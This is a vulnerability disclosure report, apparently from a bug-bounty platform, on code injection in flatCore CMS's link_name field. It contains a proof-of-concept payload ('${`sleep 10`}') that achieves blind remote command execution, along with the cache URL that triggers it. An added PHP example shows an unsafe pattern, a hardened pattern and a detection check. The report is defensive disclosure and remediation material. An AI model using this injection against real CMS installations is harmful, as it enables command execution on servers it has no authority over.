Code Injection in flatcore/flatcore-cms


Reported on Oct 13th 2021


Another code injection payload in link_name.

Proof of Concept

Insert into linkname

${`sleep 10`}

Go to http://[FLATCORE-IP]/flatCore-CMS/content/cache/cache_lastedit.php and see that the page has stopped for 10 seconds.

${} escapes the string, ` switches context to OS commands.


Blind RCE as admin user.


should clean permalinks too
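
The pattern behind the proof of concept, next to a hardened form and a review check, as an added example that is not part of the original report and is not flatCore's code. It assumes the cache file is generated by writing link names into a double-quoted PHP string literal; `render_cache_unsafe`, `render_cache_safe` and `has_dynamic_tokens` are hypothetical names.

```php
<?php
// Added illustration. Function names and the cache layout are hypothetical;
// this is not flatCore's code.

// Unsafe pattern: the value is pasted into a double-quoted PHP string literal,
// so the generated file parses "${...}" and backticks as code when requested.
function render_cache_unsafe(array $links): string
{
    $out = "<?php\n";
    foreach ($links as $i => $name) {
        $out .= "\$lastedit[$i]['link_name'] = \"$name\";\n";
    }
    return $out;
}

// Hardened pattern: var_export() emits single-quoted literals with ' and \
// escaped, and single-quoted PHP strings perform no interpolation.
function render_cache_safe(array $links): string
{
    $rows = [];
    foreach ($links as $name) {
        $rows[] = ['link_name' => (string) $name];
    }
    return "<?php\nreturn " . var_export($rows, true) . ";\n";
}

// Review check: lex (never execute) a generated file and report whether it
// contains complex string interpolation or the shell-execution operator.
function has_dynamic_tokens(string $source): bool
{
    foreach (token_get_all($source) as $tok) {
        if ($tok === '`') {
            return true;
        }
        if (is_array($tok) && in_array(
            $tok[0], [T_DOLLAR_OPEN_CURLY_BRACES, T_CURLY_OPEN], true)) {
            return true;
        }
    }
    return false;
}

// Constructed input: the link name from the report's proof of concept.
$links = ['${`sleep 10`}'];
var_dump(has_dynamic_tokens(render_cache_unsafe($links)));
var_dump(has_dynamic_tokens(render_cache_safe($links)));
```

Storing cached values in a non-executable format such as JSON removes the need for this check, because the cache is then never parsed as PHP.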

We have contacted a member of the flatcore/flatcore-cms team and are waiting to hear back 2 years ago
haxatron modified the report 2 years ago
Patrick validated this vulnerability 2 years ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrick marked this as fixed with commit 2cb02c 2 years ago
Patrick has been awarded the fix bounty
This vulnerability will not receive a CVE
functions.php#L389L397 has been validated